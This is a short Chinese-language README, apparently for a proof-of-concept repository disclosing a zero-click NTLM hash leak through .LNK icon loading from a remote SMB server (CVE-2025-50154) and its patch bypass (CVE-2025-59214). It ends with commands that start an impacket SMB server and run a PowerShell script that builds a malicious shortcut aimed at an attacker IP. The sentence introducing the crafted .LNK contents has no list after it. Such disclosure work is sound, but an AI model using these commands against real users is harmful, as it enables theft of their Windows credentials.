作者:Ruben Enkaoua 与 Cymulate
第一篇博客:零点击,一个NTLM:微软安全补丁绕过(CVE-2025-50154)
第二篇博客:打了两次补丁,仍然被绕过:新的NTLM泄露(CVE-2025-50154补丁绕过)
原始漏洞(近期已修补)是一个零点击NTLM哈希泄露,当explorer.exe渲染一个.LNK快捷方式文件的图标时触发,该文件的图标托管在远程SMB服务器上。
打补丁后,explorer.exe不再从远程SMB路径加载图标,从而阻止了NTLM哈希的自动泄露。
更新:CVE-2025-50154的补丁完全无效。我们报告了该问题,一个新的CVE被分配给了此漏洞:CVE-2025-59214。该POC对两个CVE都适用。
通过制作一个.LNK文件,其中包含:
explorer.exe进程仍会获取该远程文件,以从其RT_GROUP_ICON和RT_ICON资源中提取PE图标。

# 将二进制文件(例如Taskmgr.exe)放入目录,然后运行SMB服务器。
impacket-smbserver share . -smb2support
# 请将以下值替换为实际路径、Responder服务器IP以及服务器上的文件名。注意:可能需要20到30秒。
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"